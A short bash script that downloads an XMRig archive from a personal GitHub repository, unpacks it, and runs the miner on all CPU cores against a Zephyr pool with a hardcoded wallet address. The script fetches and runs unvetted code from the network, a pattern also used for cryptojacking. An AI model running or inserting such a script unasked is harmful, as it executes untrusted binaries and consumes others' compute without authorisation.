#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o sg.zephyr.herominers.com:1123 -u ZEPHs8XEXcX7HhCvWjqu72huNNXSvhkHpBSeubfWN2Us7oZBBArSQ8Ubhay3FSAXWKhfjfNDfvJjuSKn2pohrj9FhHLyWCx6EjG -p TIKTO -a rx/0 -t $(nproc --all)
